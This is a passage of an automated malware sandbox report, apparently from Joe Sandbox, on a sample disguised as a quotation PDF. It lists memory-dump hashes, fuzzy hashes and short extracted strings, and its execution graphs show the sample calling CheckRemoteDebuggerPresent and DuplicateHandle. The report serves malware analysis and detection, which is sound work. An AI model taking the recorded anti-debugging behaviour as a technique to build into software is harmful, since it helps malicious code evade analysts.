                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 862c8c0e0cb00de4fa494425a027c29bdcba69a043885c138230f250be982a2a
                            • Instruction ID: bb1a33d79210c8989b2a8ad7c8d70750a5e4446fd83af3bdcf917e9b2c578dbe
                            • Opcode Fuzzy Hash: 862c8c0e0cb00de4fa494425a027c29bdcba69a043885c138230f250be982a2a
                            • Instruction Fuzzy Hash: 4FD0523100D2C46BCB07877094624C8BF32EE1B218B3840DAE08AAB013C7AA0827DB12
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dc9692d7076443baf652501d47933129d13e3fb4a837618f9ba0c3b78dd8f1e2
                            • Instruction ID: 11a91c9871a36a263c3b5c40f6fcd120e960b487d947fd2f2cc0909cc9c3eef2
                            • Opcode Fuzzy Hash: dc9692d7076443baf652501d47933129d13e3fb4a837618f9ba0c3b78dd8f1e2
                            • Instruction Fuzzy Hash: CFD0C9762097C49FC703CB24D5508947F72AF9761475A40D2F1C69B673C226D836DB11
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a88dca3aaf0c4817cd59286d4f3870eaf94d484d4f30882dab0aedef55f50645
                            • Instruction ID: 1c5328da2ab14a264deba65c253088f650a7da3f20e7f5146c2ba3955fa2b2d8
                            • Opcode Fuzzy Hash: a88dca3aaf0c4817cd59286d4f3870eaf94d484d4f30882dab0aedef55f50645
                            • Instruction Fuzzy Hash: 29D0127A149284AFC3019B68E405C447FB6EF1A764B2580E1FA898F337C235DD52CB81
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae86b2c01b21e15fab0b97ed911eb26fe7466402e4716516ec0de58cfdc5ddec
                            • Instruction ID: 60c1f021a068186cccac52cfae166618ac9c5ecd8fc2fab635e5a1746da3acc7
                            • Opcode Fuzzy Hash: ae86b2c01b21e15fab0b97ed911eb26fe7466402e4716516ec0de58cfdc5ddec
                            • Instruction Fuzzy Hash: F8D02233805222EFEB3A4B11D4800383BB8DB0330978104EDC1D3E3042D728CC0292CB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7c7a196a401fe999ff183cf40c2049d9e32ef525a5d64cf6b485ce2c71aa51e9
                            • Instruction ID: 34098ff2b3eceead6e3cbdc48f384054b8a6b5e1321a5145581c951e1d47e11f
                            • Opcode Fuzzy Hash: 7c7a196a401fe999ff183cf40c2049d9e32ef525a5d64cf6b485ce2c71aa51e9
                            • Instruction Fuzzy Hash: 4DC04C1411D2C24EC7036B348D51045BF62EF135047AA00D6C2D39B2A3DA1409A5C796
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8ae9c1b62ae0494007df4b8c2499c54845ca5d2e95ba2470bb4e5bbb790bb6b2
                            • Instruction ID: b6809618247d2ef22a6075468ac42b76d00b891e9c91df1993477dbb9da44d25
                            • Opcode Fuzzy Hash: 8ae9c1b62ae0494007df4b8c2499c54845ca5d2e95ba2470bb4e5bbb790bb6b2
                            • Instruction Fuzzy Hash: D1D05E32904221CBDB358F06E408258B7F5BB05309B8A81A9D586A7106D738E8019B81
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3b0e6810d27461212c81797e66b660cc5d726b8eff483819d47cc6110102a53d
                            • Instruction ID: 663df28b57c89f8e1d7c7fd03bfacdfa2d9b05f61a3b12a18176ee538850c3a8
                            • Opcode Fuzzy Hash: 3b0e6810d27461212c81797e66b660cc5d726b8eff483819d47cc6110102a53d
                            • Instruction Fuzzy Hash: 6CD01730511102CBD7399F59F0587B97BB1B705308F0044BED51A82580D7380980CF00
                            Memory Dump Source
                            • Source File: 00000000.00000002.1941165349.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8a40000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14f56ec62cf16f89dc5f10e6500515d705dbc115a4f9e763b0ce6c3d952fda5c
                            • Instruction ID: 08025b87e748d0d06cd061ba82ea95b18f70067a8dd36fbe2b62895236b52883
                            • Opcode Fuzzy Hash: 14f56ec62cf16f89dc5f10e6500515d705dbc115a4f9e763b0ce6c3d952fda5c
                            • Instruction Fuzzy Hash: F9C02B3005B704DFC3141354B40D77832AC9307627FC07424C90F03C11477980D1CB49
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 81c1a97328ebdc7ee9f07dea2b1fe5fbcb94cf8e160ea05e74accb83e51f0100
                            • Instruction ID: 7816f5e62d00e2c2260584810c2aa8ff493e7468d4a30d78b140bb9aa8537de4
                            • Opcode Fuzzy Hash: 81c1a97328ebdc7ee9f07dea2b1fe5fbcb94cf8e160ea05e74accb83e51f0100
                            • Instruction Fuzzy Hash: 5BD06C75E01209AFEB50DBA8E890AADBAB1BB48B14F104519E41277280CA3458949B15
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: \V!m
                            • API String ID: 0-1999779074
                            • Opcode ID: a6b98f64ab98123a66e14d0f2e7dde044b188f0a50a60b19688ff49acfdf2056
                            • Instruction ID: 0e26ad3223dde3796a3f69dbc76763ed5f7265447b9203a05df386c9a073b328
                            • Opcode Fuzzy Hash: a6b98f64ab98123a66e14d0f2e7dde044b188f0a50a60b19688ff49acfdf2056
                            • Instruction Fuzzy Hash: FD914B70E00249CFDB11CFA9D8957EEBBF2BF88718F14812AD846A7354EB749845CB91
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: L+8^
                            • API String ID: 0-1607618960
                            • Opcode ID: 70ed6c59c42af70bdc744cbe39786db942f4e0230cbadf3d3a6543679eb2de67
                            • Instruction ID: f457a961f53c02d1a66decfbccbb12ee24e7c4f1ffa2c4971f55135b49f2d085
                            • Opcode Fuzzy Hash: 70ed6c59c42af70bdc744cbe39786db942f4e0230cbadf3d3a6543679eb2de67
                            • Instruction Fuzzy Hash: 26912630A0420ACFDB25CF49D584BAAF7F2FB85308F54C666C4159BA49E378BA85CF50
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$($+$B
                            • API String ID: 0-3110121830
                            • Opcode ID: 802a03f899062acb3b129f81c411256f0557545932009990773f1282adacf098
                            • Instruction ID: 8a104e3623ca9dd9c76ecac26bb1d113b5ce818650438ef8d396e2570f1830f4
                            • Opcode Fuzzy Hash: 802a03f899062acb3b129f81c411256f0557545932009990773f1282adacf098
                            • Instruction Fuzzy Hash: 2BF09270911A98CADB60CF54E94879D77B1AB01314F9098E7D51AB6240C3785ED4CF05

                            Execution Graph

                            Execution Coverage:8.5%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:5
                            Total number of Limit Nodes:0
                            execution_graph 25745 66198d0 DuplicateHandle 25746 6619966 25745->25746 25747 2bb70a8 25748 2bb70ec CheckRemoteDebuggerPresent 25747->25748 25749 2bb712e 25748->25749

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 802 2bb70a0-2bb712c CheckRemoteDebuggerPresent 805 2bb712e-2bb7134 802->805 806 2bb7135-2bb7170 802->806 805->806
                            APIs
                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02BB711F
                            Memory Dump Source
                            • Source File: 00000006.00000002.2683391401.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2bb0000_aspnet_compiler.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: 48803d32b845ccd48e467a0ffc5907547c3460afae45e4897e80866832c5d87b
                            • Instruction ID: 9d1c8ee9e42082d25127b570c82cdf7fe747d170a16c9dbf50d98c852bb635bd
                            • Opcode Fuzzy Hash: 48803d32b845ccd48e467a0ffc5907547c3460afae45e4897e80866832c5d87b
                            • Instruction Fuzzy Hash: 032159B28002598FDB10CFAAD844BEEFBF4EF49320F14845AE458A7350D778A944CFA5

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 809 2bb70a8-2bb712c CheckRemoteDebuggerPresent 811 2bb712e-2bb7134 809->811 812 2bb7135-2bb7170 809->812 811->812
                            APIs
                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02BB711F
                            Memory Dump Source
                            • Source File: 00000006.00000002.2683391401.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2bb0000_aspnet_compiler.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: bbe84095eb87ec163fb91816902bad5dfac8f946bdb871dde585c4abd273a521
                            • Instruction ID: 9023ce75c451a29fc23dc81468794b489e94f4aaf52478182ea563ab2b2f184c
                            • Opcode Fuzzy Hash: bbe84095eb87ec163fb91816902bad5dfac8f946bdb871dde585c4abd273a521
                            • Instruction Fuzzy Hash: 43213AB29002598FDB10CFAAD844BEEFBF4EF49320F14845AE455A7350D778A944CF65

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 815 66198c8-6619964 DuplicateHandle 816 6619966-661996c 815->816 817 661996d-661998a 815->817 816->817
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06619957
                            Memory Dump Source
                            • Source File: 00000006.00000002.2686704973.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6610000_aspnet_compiler.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: c402ff7a0658aed4e09de2793999b7627b31ea8b7e1186b273e39342ab5d2697
                            • Instruction ID: 1aeb62b0e0995ff90e822a5c2194dafcfce08e442fa5dc5218842ab4c6c3125e
                            • Opcode Fuzzy Hash: c402ff7a0658aed4e09de2793999b7627b31ea8b7e1186b273e39342ab5d2697
                            • Instruction Fuzzy Hash: 3821E5B5D002599FDB10CFAAD885ADEBBF9EB48720F14841AE914A7350D378A940CFA5

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 820 66198d0-6619964 DuplicateHandle 821 6619966-661996c 820->821 822 661996d-661998a 820->822 821->822
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06619957
                            Memory Dump Source
                            • Source File: 00000006.00000002.2686704973.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6610000_aspnet_compiler.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: e4d9954527e6c14ff5bf9591e6481dfe4120f70b12c8c09c0f00bde414461b18
                            • Instruction ID: e9f0b031973a9e3227bfb7e03108af91475c8a58961a28ab91c755beea811de9
                            • Opcode Fuzzy Hash: e4d9954527e6c14ff5bf9591e6481dfe4120f70b12c8c09c0f00bde414461b18
                            • Instruction Fuzzy Hash: 8621D8B5D002499FDB10CF9AD984ADEFBF9FB48710F14841AE914A7350D378A944CF65